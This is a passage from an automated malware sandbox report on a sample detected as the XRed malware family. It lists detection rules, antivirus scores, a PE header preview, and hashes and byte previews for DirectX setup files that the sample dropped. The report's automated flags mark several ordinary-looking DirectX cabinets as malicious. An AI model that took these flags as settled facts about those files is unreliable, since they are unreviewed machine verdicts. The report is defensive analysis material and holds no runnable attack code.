                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 94%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                              C:\Windows\Logs\DirectX.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):44136
                                                                                              Entropy (8bit):5.353600136878281
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ORnJa10OSg6HroC7jf4KEdRdoVwIBZZcU6MJNY8Rj6x8i/jJfDb20/xAx0Ix1ULc:Oam
                                                                                              MD5:41C2F221F8F75FB214CFB1804491344B
                                                                                              SHA1:3BC0851662C804A97B1204E891B5AFFFF9974E0A
                                                                                              SHA-256:B695B39844670CF0E1E32D69F23B5BBE0C656DB9CFDC685F061AE957C6E18662
                                                                                              SHA-512:F2727C1E961110739FA8ACCBB66CE59EC9403C5D1649366C9ADC97260064990386C16A0127D981DD7AECC7B04785FE3F2DA8DCF7FB9D2F144035C5E40FB5BB3F
                                                                                              Malicious:false
                                                                                              Preview:01/02/25 14:37:44: DXWSetup: ***** DXWSETUP *****..01/02/25 14:37:44: DXWSetup: WinMain()..01/02/25 14:37:44: DXWSetup: IsIA64(): not IA64...01/02/25 14:37:44: DXWSetup: Unable to get Version on target file C:\Windows\system32\directx\websetup\dsetup.dll..01/02/25 14:37:44: DXWSetup: Installed file C:\Windows\system32\directx\websetup\dsetup.dll..01/02/25 14:37:44: DXWSetup: Unable to get Version on target file C:\Windows\system32\directx\websetup\dsetup32.dll..01/02/25 14:37:44: DXWSetup: Installed file C:\Windows\system32\directx\websetup\dsetup32.dll..01/02/25 14:37:44: DXWSetup: GetDXVersion(): Unable to get RC string from registry...01/02/25 14:37:44: DXWSetup: DirectX Version: 4.09.00.0904.00..01/02/25 14:37:44: DXWSetup: Setup Version: 4.09.00.0904.00..01/02/25 14:37:44: DXWSetup: A newer version of DirectX have been installed already...01/02/25 14:37:45: dsetup32: IsWow64(): running on Wow64...01/02/25 14:37:52: DXWSetup: CDXWSetup::CDXWSetup()..01/02/25 14:37:52: DXWSetup: CDX

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1341394 bytes, 5 files, at 0x44 +A "d3dx9_25_x64.cat" +A "d3dx9_25.dll", flags 0x4, ID 6661, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1350562
                                                                                              Entropy (8bit):7.999714569554039
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qc+wdspnWpjnrcf+FH+guUawET50xShS+KMMMBNNxjUBH/0ghOw5b:r+AspngnK1TDhS+jMMBN3jeHLhOE
                                                                                              MD5:E961A77647E7FC2597A68FF572F730E1
                                                                                              SHA1:976D1CDE1EC28A4992E1CBC345637447115F14C8
                                                                                              SHA-256:A239E99D02FBFC9D30D5B705AA743FC070386FAEA1A66B3D67099AB446568A12
                                                                                              SHA-512:CF72AE18E99942D959BCE58678F544A10C98802D919ADC30737389D6CC0D492F8D7902E0E2CD04501FE6429B96C782649658D2D35C879A202C23E88570A15B94
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............w...7.........r2. .d3dx9_25_x64.cat..V:.7.....r2|. .d3dx9_25.dll......t:...r2X. .infinst.exe.&....V;...r2.. .apr2005_d3dx9_25_x64.inf......Y;...r2-. .d3dx9_25_x64.inf..q...9..[.... .cm......R.P...OB.."..AI5.]..."..UL.F.$.T.S*..iR..rJA.O9N/..jGJ.........\..=.....z.....5L..9.SA/&..,;e.l.@...C..Y..z...a}M...d..qh...:.'..@...o............T.{7..s.d1".........Y.*./.z..7(....N.k...,3...).h.>X..X...l.....A\p[....`y.......G..^d.c".j..k.....M...].ef.@..c...-.!.%O3.<G..B.y..A,.B..G%0..K...J...XX.Ig.|=.. ....#.t..>.#....S...^@..@.^m..@.l.....zI...y...L.Q.C.....x.[W..y..Z...o^.].G...G..4.q........o.xQA.....O...&B..s!......=Ovrtq.X.-}.u,k..:ju&m,$.5.V.T.z%......\.G.Dx...~-W.......... X.>.L...I.y?.f.1....4..J.b....%.e.t..U....o(..A...o.?.X..._?......).$.k.#..5o.>..&.0..a....8k....&E......$...Y..q.Y.....O...?...}}=.]'7.Knw....@.n.../.....".....RB.tg.._..Se'2.B)........6..p.K=......fz...z......I..y..uA

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1391870 bytes, 5 files, at 0x44 +A "d3dx9_30_x64.cat" +A "d3dx9_30.dll", flags 0x4, ID 6646, number 1, extra bytes 20 in head, 123 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1401038
                                                                                              Entropy (8bit):7.999678252363499
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qpSOf0NLgpl5UCjJlezBreTxpgDysu8tyDJhllXCQaXVVeOYa54Sx0HfWyRA7ydL:80xgpl5UCLezBrg4uDDJhlAQQn8Sk87a
                                                                                              MD5:5EC6F520F3AFCC6494AB0D43B690EBD4
                                                                                              SHA1:2359E14CB6DA44AA89A3815E905D6FFD81960D02
                                                                                              SHA-256:27D99894E2A68601F46487C9999723DC83BCC9C6F903F2E2622D05668035B015
                                                                                              SHA-512:9DB4A9581EDAE2681491D5E13228642737D0D186E0E1672B063482B2E699274ACFCB81DFA9631902E93E009ADC0BBD9447061830C8CE2FEAD6743E2D45AAED60
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....<......D............................<...#..............{..............44f .d3dx9_30_x64.cat...;........4!e .d3dx9_30.dll.......<....4.d .infinst.exe.&.....=....4.e .apr2006_d3dx9_30_x64.inf.......=....4.e .d3dx9_30_x64.inf..vs..9..[.... ..q..@..$Q.f...>....".}...W].}.uL.E.2H]..T.i%.h-...%ZX.<x{.ZX............GC......|/M...H....zh.n...S.0.I%&....E..Kq..g.....#..!+.....X.<.]..-N..1X.E.qg....6..O....{...Q.."..!"...M..R.ff.]...n...KG.x.T...{.@E1~.{@..+..f..}.EkQ.....B......Gg... ..E0.D.$. ...r.+.;Td4...2..........z..:J%..S.g.Z....._.).*.H...)!...T.....AA..b(.lH..-9&rp....9"r\..s..)........%..._2<..R.t..l>z.;...........3!..U..~..O....!.......\vo.%...q+.B.b2'.....z..W..A...5..B...6..B..B.....v.AZ....(....;.2..8.....M..is..mn.9..]..Ys.X"..&...R....S..........%.o.s./.P4......U..O.'.W...n-&H...(.9*:.x..zT9.(..D{L.....M.-.....N..U....n|.y......{r..Y.I......b.0..P....a..|..F:...)..U9=...g.........!y.........e.w...K.i.\.8Z....O..O.c.\.'...@./..!....aM.<.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 173173 bytes, 6 files, at 0x44 +A "xact2_1_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):182341
                                                                                              Entropy (8bit):7.996367169399176
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:iP7n/mIkqSEiqQAK23yLLBIvm2dozls4yaqS0yaP/Y5UZEPnQ79:iPL+fRqQAD3Tvxd8l/zsg5UZEIp
                                                                                              MD5:6CA70CDB3FA575506BA4035E9A50D8E4
                                                                                              SHA1:A2A20F5F95A1AB293A188A55BF593A82EA0DCB7F
                                                                                              SHA-256:F82B2043B470BF0E711C3D05D758A379920340212437917B5D98AF0C14E7BFE0
                                                                                              SHA-512:A453CED526332ACE37861A0A862FFF3710EF74ED57965F28DD279F526A2F33C390E82FD2C49BEE75476E5B4C349C40A71EEE49EDAC720236A16780DFD700FE62
                                                                                              Malicious:true
                                                                                              Preview:MSCF....u.......D................!..........u....#..................! .........46f .xact2_1_x64.cat..@..! ....C4)E .x3daudio1_0.dll..`...`.....4.e .xactengine2_1.dll............4.d .infinst.exe............4.e .apr2006_xact_x64.inf............4.e .xact2_1_x64.inf.....9..[......Z..A.P%..?.....DIx?...=HG..R.62^...T)....:.A.8..;.$.(..8.-......(..{.m...w.{.M...H.a....:.\^.S-R....c...u.k.^..q...5.bbK.0i.w.U).........C3..0.............."..3}...n..n..H. .((...B.l..#*hp..(>.."-a.|.[TuB..1.V....L..B....^Pi..`.b.....Sx*C...%.$.!....L..`.A..4.f.\.a..s......319..2..0QP..j.&.P\.B..z.~.P..P..$O...pI....o.T.F.../.d..g4...@EX...$I.2.....r.....B...A.....:.....HH5.....h... ...^.3.T...w...;...n...H......M...R.*..W .y.H....GD...Q..%..........DJ.6.#.."G.}@/|.....-A....W.....J..d..1....'P.......|b.$.z..yL..Jg...._r..W....P5.Q`...qyy.. ..s..p.<[.fr!.uv:..3.Y..9j.#or.A.<..T....7*}.F..d.:.]......>..:...Qs...a.C-...3}..r...#AU..O?=.2.T...e...e......p.S...4.....`....9|..~R.I....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127143 bytes, 5 files, at 0x44 +A "xact2_1_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136311
                                                                                              Entropy (8bit):7.992811243778454
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:NqvFmCDJEmTNSPtjVgIc5Ul8IlTq3UJWaL6LHZF/U7a7b0qJFkd22ig3nQ1d7+Z/:NYmCyC5U+Il0yWYSMaXzkYQ3nWUZDuY
                                                                                              MD5:A2132A62F9AB0BDDC3207166DC014581
                                                                                              SHA1:53B19AC3E6C6752011BA641EE3C409ED10C95DD9
                                                                                              SHA-256:52C71C89CCC22FED3D7C985A22C464451AF34B63B3A26A3799BC25D881221EBC
                                                                                              SHA-512:76FABD7F440B6F9B409B0B2635EAD4EF332563A9BED738A722A7C6B9A077094154BF735CAF02C67191B08AB0A19FC03E05EF3D984F6E34DCF3BD587A05D2F424
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........47f .xact2_1_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V.....4.d .xactengine2_1.dll.W..........4.e .apr2006_xact_x86.inf............4.e .xact2_1_x86.inf...9..8..CK.|.\....l...X.".....Y.. y......EVI..... *.rzz..D..t.b....EO...((.S.TL.....]............u........j.{h......E..Q..E9.u..R).n.\E.a.N..30<.~UI.L.B...R.r.U...YJ.. .B...F..W3V..,..L,.g.S.G...\+.f...I.z.t*.JK.s(F. +....f.yBn...cv.-.. 7......n..0....9.<Q...za.$...0..}...n.J.s..@|d.H.b.,....c1..K..1>&....p.....Xh.?,._[..X......q...GT*7..2....V.l.....<(;@..?O.9)...k.%..8.. ..<[..a.T*h.2..........H.#.h...Qp[w3.A...f.!..ew..l.v....~...=..=`....".......z..d|"n......Q.EE..p4&Zz........?..@4;...k....x.R.H...p uf.7.yA..)....wRf/.."!...l..5.C..+..W.>..Zy.qj.....(.....{....4....`,...^.p'R.l.F..qP....{.nc."..m....5.".i.7.q.R...d/..f6..l..Qo6.......Fb]yn..U..lE~T..]..}........[!.....F.P..'...S.....V...w+....)..W..2*.B.J..In\]\....p.P.OK.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90309
                                                                                              Entropy (8bit):7.986243949537019
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
                                                                                              MD5:B0669F7D395078BEE0087B089F0B45C5
                                                                                              SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
                                                                                              SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
                                                                                              SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....<......D...............!............<...#.............................44f .xinput1_1_x64.cat..F.........4.d .xinput1_1.dll......e.....4.d .infinst.exe.V....l.....4.e .apr2006_xinput_x64.inf......o.....4.e .xinput1_1_x64.inf.. ...9..CK.{.XSI..MHh..AD.. .7t...4..H.TTB...$.."...,...v].{Y{...u..k.......w..pA..}......<.\.9s.w.9sf.x...}...y..L......j`.c2..6..>..L.i.......F.......QZ...X.p.}c.i.`.,^X/l.8...m._..Fv0.}pOO.................N..>....O 6......X..s....A.'.s0....X...c._0.|...?... .....IM.Ln..e..&..$...6?...K.....f7../.A..2...@=..7.`..L&..u:...w.>...q.q'=&...Sf....'..,.S`R,..aJ..@.nO.6.....TEF+.K...4.-.$....<e........ob.^..\({@).F.A.../.'..I../.F>@}..N.f....h...........q\.7#.~...Rm.2...HO0...{...dx....d..00<.3.v..........d....o:.e...,.....I..^v&.t .O..)Y;.B.7|Q.K....Oo...g.L..5.I.....;t.i.\Z.V..>../..G+.!....z5,.*....1.L..#....58..f....7.x..Va~....bY....\+..U.-M.D..H....d"n{..b.X..V...Lqz..k.h.5..I.d)E..x'.hc.dp.Dr.8E,.(.R..+..5.YZS.1.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49218
                                                                                              Entropy (8bit):7.962835058038329
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
                                                                                              MD5:E207FB904E641246F3F7234DB74121FC
                                                                                              SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
                                                                                              SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
                                                                                              SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
                                                                                              Malicious:false
                                                                                              Preview:MSCF....r.......D...........................r....#.............................46f .xinput1_1_x86.cat............4.d .xinput1_1.dll............4.e .apr2006_xinput_x86.inf.....R......4.e .xinput1_1_x86.inf...G..>..CK..\SG.8|....&l....-n.6....(Z........"PH..,...+.G.V..b..V....Zm.Z..Xm..ZQ..E.{.......}....&L.g.9s....Jz?tp..N.;.]Y....!...b......t.c..'D%v[...8.8..........F.spf2y,.Gpe.w.......d...o.vs.........G...).bQ....cE%....."..GH.`"....D..B!..i.1..... ..0.. ..K# ...@*...C!M....R....SDq.c...b....#!6....b.....(/.`.....Q....(.!.pE....lB.a....L.M..[..E.........|...;.H!..".P.j........9..<.t.l....]5w.;...R.9qQx...@x..8.........$.1.az!.Z..?.rDP+...c..)U'J..E.H..j....%.......w.;..x.O...>........`0.A4..d.....dT...Q.3..y0.."..].x"...|.C.bs.,...`..h..#D..y.v..OM.1u{..C .X.N......+0....f2...3;...@...P......Z.......H.x.E<....A.-.4OA.Vi.f......."n\....b\...\M+.e.....k.N.q.`....%.@.../Q..V.e...s..."w.......KI........4.u.p..J^.V....D....t.0J...H.HMVg.d....B.v.]..)..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692652 bytes, 7 files, at 0x44 +A "d3dx10_33_x64.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 10164, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701820
                                                                                              Entropy (8bit):7.999560976493214
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:RK6/uIaEOb2fc+HdQn/lDTK79RrFEYnj3LUFWQJcR1WrADy2IYxUSsEtiqUoY:RUlb2fc+9Qn/u9RrFEO3LUjU95I/EtiL
                                                                                              MD5:906318E8C444DAAAEA30550D5024F235
                                                                                              SHA1:3F3DCCF0A8A1CBF6F603BE1DA02E1E2BF89D24FC
                                                                                              SHA-256:1A37565C5B868B6A5C67F3E24B8AF547506799444CB77C7086E7B0CEC852F239
                                                                                              SHA-512:0A7AED2F49EA3DCBCA1607FC46F166A44BC9D08589DB05051B422C8AD84ADF322352F71333367C612F9579B4AACB4CD6B82489DDF168AD67FB4D42AB52999C88
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........4...=....).........6.. .d3dx10_33_x64.cat.p]...)....l6O. .d3dcompiler_33.dll.h...2.....o6=. .d3dx10_33.dll.h....B.....6.. .infinst.exe.L....T.....6F. .apr2007_d3dx10_33_x64.inf.....NW.....6F. .d3dx10_33_x64.inf......Z.....6F. .d3dx10_33_x64_xp.inf.d7$....[.....@.....P...O...u..AA.?.nE.DW.$.3B..BU.H...!.W..".J.^.IJ$(....hD.......vo?.$ef . t.=.......p.H.P.D&..t@..\..sCb!1i..O...........w................l{......d...-....Q.\.......xCNH....+.%"..;..o..DD..r.4B."...H`.?.P&.....>"(...E..HT.Q....:..e9 .{.j%...e.....$.p..R.....;.%!..>.....G......*.....x.~.@.....H.K....P?.w.^....7.R.RW ../p..w, Y..bu W.r.h.T..$Q.....\z....V_.^..N0=....K~.>.$v.}...y7"!.w...s..@b....~\.ily........Y....l.`.^.?y...w.. ....]..)...R1....... ...#......G...J.F.0x1.6^S>.*/.x..p..............(.B..$.....r.....CO9.R.1..a.a..})..^.h...+.P..}-?Z..H..t....U..gO..M.].l.2..........*.d.N6G...I..=..L=O...........:.....*...... .......2.c.?'.<1..w......?..E

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............Y#..............#..............1....).........6{. .d3dx10_33_x86.cat.p%...)....l6O. .d3dcompiler_33.dll.h...2O....o6=. .d3dx10_33.dll............6E. .apr2007_d3dx10_33_x86.inf.I...7......6E. .d3dx10_33_x86.inf.i..........6E. .d3dx10_33_x86_xp.inf..j"(.2..CK.y<...........l.al..)e.!a.&...l3.-.h....j.,."D.R..O...%W).gFn........}.z5..<s..s>.s>..|...U*x...Z..!..E..U...<$.....y0.sPH)....<..<.4.M.@...U.......\).@..6.'.Yi.!.....R.@.&..X..i..z..Y....`...C...).Cz...p.9H$...t@....I.s....;.[.C+A"..<.7.w3..A..u...s8$....ma.Y5.3.e C.e.yAAP ...@L..8.,?..h.a..E2=..9=.......e5|a./3B"q....Zh.P...6P.."....k....:.w..:.h%.....H.0u......+..D.+!..-...9.sD...O...QZ.a..8v#......Q..N..l%....c..?P..........>.....~......0.F.VB!1ii..v5.4.R.R.....LX.X.........w.8.'.~..p.8.......A......6w.\...~..[.B.E.!..h....uQR..q.....O.....R......Cth-.....$z..B..00.l.Uo.. '..m..fB..}...ij....<..RX._......k .k1.xH......A3y.<~V>.s^gV.8+.;+...CP..+. &.....PH..).UA{...E..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601398 bytes, 6 files, at 0x44 +A "d3dx9_33_x64.cat" +A "d3dx9_33.dll", flags 0x4, ID 8295, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610566
                                                                                              Entropy (8bit):7.999804070832858
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NjzSeifTXjfzuO/m35sCqSrSBEZqyi2bjbBfQbIKpP5FfiB0Qjq/X1ZXp8e:NvSeSTXj7u0OUM9UStQbNd/Gjq/FD
                                                                                              MD5:F33C12F535DC4121E07938629BC6F5B2
                                                                                              SHA1:6B93FBE3D419670A71813E087D289B77E58E482B
                                                                                              SHA-256:3CA2ACF6B952D6438B91E540F39ABCB93EE12E340BA1302F7406F01568E5CF91
                                                                                              SHA-512:DF1753AB43D5B7FDE2A5EB65A77B37BA28599BC0683A4306F101C75F82B0F1A2C8DDF5741981073CC5DF26E9EA38C9A495ED0FB1689D2E7FC7D6F693759C822A
                                                                                              Malicious:true
